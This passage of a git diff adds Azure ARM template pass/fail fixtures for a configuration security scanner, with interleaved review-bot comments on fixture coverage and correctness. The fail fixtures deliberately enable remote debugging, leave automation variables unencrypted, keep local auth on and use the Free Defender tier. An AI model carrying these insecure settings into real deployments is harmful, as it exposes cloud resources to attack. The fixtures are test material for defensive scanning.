+ "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json new file mode 100644 index 00000000000..26100716400 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json 
@@ -0,0 +1,77 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "fail",
+ "location": "[parameters('location')]",
+ "kind": "app,linux",
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "reserved": true,
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2",
+ "remoteDebuggingEnabled": true
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
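Review bot: The fail fixture sets `"remoteDebuggingEnabled": true` as a JSON boolean while the neighbouring `"http20Enabled": "true"` in the same `siteConfig` is a string, and ARM templates in the wild use both spellings; if the check compares the raw value against `True`, a template written as `"remoteDebuggingEnabled": "true"` would be reported as passing. The pass.json and pass1.json hunks that follow cover the boolean `false` and the absent-key cases but not the string form, so a second fail fixture with `"remoteDebuggingEnabled": "true"` would pin the intended handling in a test. The check implementation is not in this chunk, so this is a coverage suggestion rather than a confirmed gap.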
diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json
new file mode 100644
index 00000000000..5e2c3318c72
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json
@@ -0,0 +1,77 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "pass",
+ "location": "[parameters('location')]",
+ "kind": "app,linux",
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "reserved": true,
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2",
+ "remoteDebuggingEnabled": false
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json
new file mode 100644
index 00000000000..f36cba465a0
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json
@@ -0,0 +1,76 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "pass1",
+ "location": "[parameters('location')]",
+ "kind": "app,linux",
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "reserved": true,
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2"
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
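Review bot: pass1.json is the pass fixture that omits `remoteDebuggingEnabled` altogether, so it pins that an absent property counts as a pass rather than as unknown. That is only right because App Service leaves remote debugging off unless the property is set, and nothing in the fixture says so; JSON cannot carry a comment, so I would add one next to the test that loads it, e.g. `# pass1: remoteDebuggingEnabled absent -> platform default (off) -> PASSED`. Worth confirming the check returns PASSED and not UNKNOWN for the absent key.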
diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/fail.json b/tests/arm/checks/resource/example_AutomationEncrypted/fail.json
new file mode 100644
index 00000000000..51f1623379f
--- /dev/null
+++ b/tests/arm/checks/resource/example_AutomationEncrypted/fail.json
@@ -0,0 +1,22 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {},
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.Automation/automationAccounts/variables",
+ "apiVersion": "2020-01-13-preview",
+ "name": "fail",
+ "properties": {
+ "name": "tfex-example-var",
+ "value": "Hello, Arm Basic Test.",
+ "isEncrypted": false
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Automation/automationAccounts', 'example')]"
+ ]
+ }
+ ],
+ "outputs": {}
+}
diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json b/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json
new file mode 100644
index 00000000000..b416528b505
--- /dev/null
+++ b/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {},
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.Automation/automationAccounts/variables",
+ "apiVersion": "2020-01-13-preview",
+ "name": "fail1",
+ "properties": {
+ "name": "tfex-example-var",
+ "value": "Hello, Arm Basic Test."
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Automation/automationAccounts', 'example')]"
+ ]
+ }
+ ],
+ "outputs": {}
+}
diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/pass.json b/tests/arm/checks/resource/example_AutomationEncrypted/pass.json
new file mode 100644
index 00000000000..cca3b5d5366
--- /dev/null
+++ b/tests/arm/checks/resource/example_AutomationEncrypted/pass.json
@@ -0,0 +1,22 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {},
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.Automation/automationAccounts/variables",
+ "apiVersion": "2020-01-13-preview",
+ "name": "pass",
+ "properties": {
+ "name": "tfex-example-var",
+ "value": "Hello, Arm Basic Test.",
+ "isEncrypted": true
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Automation/automationAccounts', 'example')]"
+ ]
+ }
+ ],
+ "outputs": {}
+}
diff --git a/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json
new file mode 100644
index 00000000000..9336aeba462
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json
@@ -0,0 +1,106 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "5620168434409602803" + } + }, + "parameters": { + "batchAccountName": { + "type": "string", + "defaultValue": "[format('{0}batch', toLower(uniqueString(resourceGroup().id)))]", + "metadata": { + "description": "Batch Account Name" + } + }, + "storageAccountsku": { + "type": "string", + "defaultValue": "Standard_LRS", + "allowedValues": [ + "Standard_LRS", + "Standard_GRS", + "Standard_ZRS", + "Premium_LRS" + ], + "metadata": { + "description": "Storage Account type" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "storageAccountName": "[format('{0}storage', uniqueString(resourceGroup().id))]" + }, + "resources": [ + { + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2023-01-01", + "name": "[variables('storageAccountName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('storageAccountsku')]" + }, + "kind": "StorageV2", + "tags": { + "ObjectName": "[variables('storageAccountName')]" + }, + "properties": { + "minimumTlsVersion": "TLS1_2", + "allowBlobPublicAccess": false, + "networkAcls": { + "defaultAction": "Deny" + }, + "supportsHttpsTrafficOnly": true + } + }, + { + "type": "Microsoft.Batch/batchAccounts", + "apiVersion": "2024-02-01", + "name": "fail", + "location": "[parameters('location')]", + "tags": { + "ObjectName": "[parameters('batchAccountName')]" + }, + "properties": { + "autoStorage": { + "storageAccountId": "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + } + + }, + "dependsOn": [ + "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + ] + } + ], + 
"outputs": { + "storageAccountName": { + "type": "string", + "value": "[variables('storageAccountName')]" + }, + "batchAccountName": { + "type": "string", + "value": "[parameters('batchAccountName')]" + }, + "location": { + "type": "string", + "value": "[parameters('location')]" + }, + "resourceGroupName": { + "type": "string", + "value": "[resourceGroup().name]" + }, + "resourceId": { + "type": "string", + "value": "[resourceId('Microsoft.Batch/batchAccounts', parameters('batchAccountName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json new file mode 100644 index 00000000000..e0cf6278352 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json 
@@ -0,0 +1,109 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "5620168434409602803" + } + }, + "parameters": { + "batchAccountName": { + "type": "string", + "defaultValue": "[format('{0}batch', toLower(uniqueString(resourceGroup().id)))]", + "metadata": { + "description": "Batch Account Name" + } + }, + "storageAccountsku": { + "type": "string", + "defaultValue": "Standard_LRS", + "allowedValues": [ + "Standard_LRS", + "Standard_GRS", + "Standard_ZRS", + "Premium_LRS" + ], + "metadata": { + "description": "Storage Account type" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "storageAccountName": "[format('{0}storage', uniqueString(resourceGroup().id))]" + }, + "resources": [ + { + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2023-01-01", + "name": "[variables('storageAccountName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('storageAccountsku')]" + }, + "kind": "StorageV2", + "tags": { + "ObjectName": "[variables('storageAccountName')]" + }, + "properties": { + "minimumTlsVersion": "TLS1_2", + "allowBlobPublicAccess": false, + "networkAcls": { + "defaultAction": "Deny" + }, + "supportsHttpsTrafficOnly": true + } + }, + { + "type": "Microsoft.Batch/batchAccounts", + "apiVersion": "2024-02-01", + "name": "pass", + "location": "[parameters('location')]", + "tags": { + "ObjectName": "[parameters('batchAccountName')]" + }, + "properties": { + "autoStorage": { + "storageAccountId": "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + }, + "keyVaultReference": { + "id": "test", + "url": "https://test.com" + } + }, + "dependsOn": [ + 
"[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + ] + } + ], + "outputs": { + "storageAccountName": { + "type": "string", + "value": "[variables('storageAccountName')]" + }, + "batchAccountName": { + "type": "string", + "value": "[parameters('batchAccountName')]" + }, + "location": { + "type": "string", + "value": "[parameters('location')]" + }, + "resourceGroupName": { + "type": "string", + "value": "[resourceGroup().name]" + }, + "resourceId": { + "type": "string", + "value": "[resourceId('Microsoft.Batch/batchAccounts', parameters('batchAccountName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json new file mode 100644 index 00000000000..d75a866210a --- /dev/null +++ b/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json @@ -0,0 +1,15 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Security/pricings", + "apiVersion": "2018-06-01", + "name": "fail", + "properties": { + "pricingTier": "Free", + "resourceType": "Microsoft.Security/pricings" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json new file mode 100644 index 00000000000..e7cf4f13566 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json @@ -0,0 +1,15 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Security/pricings", + "apiVersion": "2018-06-01", + "name": "pass", + "properties": { + "pricingTier": "Standard", + "resourceType": "Microsoft.Security/pricings" + } + } + ] +} \ No newline at end of file 
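Review bot: `keyVaultReference` in pass.json is `{"id": "test", "url": "https://test.com"}`, placeholders that are not shaped like a Key Vault resource id or vault URL; if the check only tests for the presence of the block this passes, but a realistically shaped constructed value (an id of the form `/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.KeyVault/vaults/<vault>` and a URL of the form `https://<vault>.vault.azure.net/`) would document what a real pass looks like and survive a later check that validates the reference. Separately, `metadata._generator.templateHash` is identical in fail.json and pass.json although the two templates differ, so the Bicep provenance block is stale; dropping `metadata` from both fixtures avoids carrying a misleading hash.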
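Review bot: for `Microsoft.Security/pricings` the plan being priced is carried by the resource `name` (for example `StorageAccounts`), whereas the fail.json fixture names the resource `fail` and adds a `resourceType` property that, as far as I know, the pricings resource does not define; pass.json has the same shape. As written the pair only pins `pricingTier`, so a check that passes any Standard-tier plan would also pass here even though the directory name says storage. If the check is meant to be storage-specific, I would use `"name": "StorageAccounts",` in both fixtures, drop `resourceType`, and add a fixture for a non-storage plan name to pin that it is skipped rather than evaluated.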
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json
new file mode 100644
index 00000000000..4e30ed5ab84
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.MachineLearningServices/workspaces",
+ "apiVersion": "2022-12-01",
+ "name": "fail1",
+ "location": "West US",
+ "properties": {
+ "managedNetwork": {
+ "outboundRules": {
+ "rule1": {
+ "type": "PrivateEndpoint"
+ }
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json
new file mode 100644
index 00000000000..934ab52654d
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.MachineLearningServices/workspaces",
+ "apiVersion": "2022-12-01",
+ "name": "fail2",
+ "location": "West US",
+ "properties": {
+ "managedNetwork": {
+ "outboundRules": {
+ "rule1": {
+ "type": "ServiceTag"
+ },
+ "rule2": {
+ "type": "PrivateEndpoint"
+ }
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json
new file mode 100644
index 00000000000..dcd9c4761a5
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json
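Review bot: the fixtures that contain a `PrivateEndpoint` outbound rule are the fail cases (fail.json, fail2.json) while `ServiceTag` only, or no managed network at all, is a pass (pass.json and pass2.json in the next hunk), which reads as the reverse of what the directory name AzureMLWorkspacePrivateEndpoint suggests, and nothing here states which reading is intended. I cannot tell from the fixtures whether the check means "must not use private-endpoint outbound rules" or the name is simply inherited, so the unit test that loads them should say so in one line, e.g. `# outboundRules of type PrivateEndpoint are the failing case for this check`. Separately, fail.json names its resource `fail1` and pass.json `pass1`, unlike the other fixture directories in this commit where the resource name matches the file name; harmless if the test asserts on resource ids, but worth aligning.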
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.MachineLearningServices/workspaces",
+ "apiVersion": "2022-12-01",
+ "name": "pass1",
+ "location": "West US",
+ "properties": {
+ "managedNetwork": {
+ "outboundRules": {
+ "rule1": {
+ "type": "ServiceTag"
+ }
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json
new file mode 100644
index 00000000000..58a530a81b0
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.MachineLearningServices/workspaces",
+ "apiVersion": "2022-12-01",
+ "name": "pass2",
+ "location": "West US",
+ "properties": {
+ "description": "No netowks"
+
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json
new file mode 100644
index 00000000000..4fbba1f7504
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json
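Review bot: `"description": "No netowks"` in pass2.json misspells networks, and since this string is the only thing in the fixture that says why it passes, the wording should carry that intent; I would write `"description": "No managed network configured"`. The stray empty line after it inside `properties` can go at the same time.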
@@ -0,0 +1,33 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "accounts_pike_name": {
+ "defaultValue": "pike",
+ "type": "String"
+ }
+ },
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.CognitiveServices/accounts",
+ "apiVersion": "2023-05-01",
+ "name": "fail",
+ "location": "westeurope",
+ "tags": {
+ "createby": "Terraform"
+ },
+ "sku": {
+ "name": "S0"
+ },
+ "kind": "Face",
+ "properties": {
+ "publicNetworkAccess": "Enabled",
+ "restrictOutboundNetworkAccess": false,
+ "allowedFqdnList": [],
+ "disableLocalAuth": false,
+ "dynamicThrottlingEnabled": false
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json
new file mode 100644
index 00000000000..90441225f09
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json
@@ -0,0 +1,36 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "accounts_pike_name": {
+ "defaultValue": "pike",
+ "type": "String"
+ }
+ },
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.CognitiveServices/accounts",
+ "apiVersion": "2023-05-01",
+ "name": "pass",
+ "location": "westeurope",
+ "tags": {
+ "createby": "Terraform"
+ },
+ "sku": {
+ "name": "S0"
+ },
+ "kind": "Face",
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "publicNetworkAccess": "Disabled",
+ "restrictOutboundNetworkAccess": false,
+ "allowedFqdnList": [],
+ "disableLocalAuth": false,
+ "dynamicThrottlingEnabled": false
+ }
+ }
+ ]
+}
\ No newline at end of file
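Review bot: pass.json differs from fail.json in two places, the added `identity` block and `publicNetworkAccess` flipped from `Enabled` to `Disabled`, so the pair does not isolate the property an identity check evaluates. If the check only looks at `identity.type`, keep `"publicNetworkAccess": "Enabled",` in pass.json so the only difference is the block under test; if it also requires public access to be disabled, that should be pinned by a third fixture that has the identity but leaves public access enabled and is expected to fail.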
diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json
new file mode 100644
index 00000000000..8f1a46d325f
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json
@@ -0,0 +1,26 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "accounts_pike_name": {
+ "defaultValue": "pike",
+ "type": "String"
+ }
+ },
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.CognitiveServices/accounts",
+ "name": "fail",
+ "location": "West US",
+ "sku": {
+ "name": "S0"
+ },
+ "kind": "CognitiveServices",
+ "properties": {
+ "publicNetworkAccess": "Enabled",
+ "disableLocalAuth": false
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json
new file mode 100644
index 00000000000..95abec6ec32
--- /dev/null
+++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json
@@ -0,0 +1,25 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "accounts_pike_name": {
+ "defaultValue": "pike",
+ "type": "String"
+ }
+ },
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.CognitiveServices/accounts",
+ "name": "fail2",
+ "location": "West US",
+ "sku": {
+ "name": "S0"
+ },
+ "kind": "CognitiveServices",
+ "properties": {
+ "publicNetworkAccess": "Enabled"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json
new file mode 100644
index 00000000000..90f828d966f
--- /dev/null
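Review bot: the `Microsoft.CognitiveServices/accounts` resource in fail.json, fail2.json and pass.json (next hunk) has no `apiVersion`, which every other fixture in this commit sets and which a deployable ARM resource requires; if the ARM runner tolerates the omission the tests still run, but the fixtures then exercise a shape real templates never have. I would add `"apiVersion": "2023-05-01",` after the `type` line in all three. The `$schema` URL in these three files also uses `2023-05-01` where the other fixtures use `2019-04-01`; I am not aware of a deploymentTemplate schema with that date, and it looks like the resource apiVersion was pasted into the schema path, so `2019-04-01` seems to be the intended value.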
+++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json
@@ -0,0 +1,26 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "accounts_pike_name": {
+ "defaultValue": "pike",
+ "type": "String"
+ }
+ },
+ "variables": {},
+ "resources": [
+ {
+ "type": "Microsoft.CognitiveServices/accounts",
+ "name": "pass",
+ "location": "West US",
+ "sku": {
+ "name": "S0"
+ },
+ "kind": "CognitiveServices",
+ "properties": {
+ "publicNetworkAccess": "Enabled",
+ "disableLocalAuth": true
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json
new file mode 100644
index 00000000000..da1b0618d29
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json
@@ -0,0 +1,186 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "11556612112757819680" + } + }, + "parameters": { + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources" + } + }, + "clusterName": { + "type": "string", + "defaultValue": "[format('kusto{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of the cluster" + } + }, + "skuName": { + "type": "string", + "defaultValue": "Standard_D12_v2", + "metadata": { + "description": "Name of the sku" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "maxValue": 1000, + "minValue": 2, + "metadata": { + "description": "# of nodes" + } + }, + "databaseName": { + "type": "string", + "defaultValue": "kustodb", + "metadata": { + "description": "Name of the database" + } + }, + "eventHubNamespaceName": { + "type": "string", + "defaultValue": "[format('eventHub{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of Event Hub's namespace" + } + }, + "eventHubName": { + "type": "string", + "defaultValue": "kustoHub", + "metadata": { + "description": "Name of Event Hub" + } + } + }, + "variables": { + "dataReceiverId": "a638d3c7-ab3a-418d-83e6-5f17a39d4fde", + "fullDataReceiverId": "[subscriptionResourceId('Microsoft.Authorization/roleDefinitions', variables('dataReceiverId'))]", + 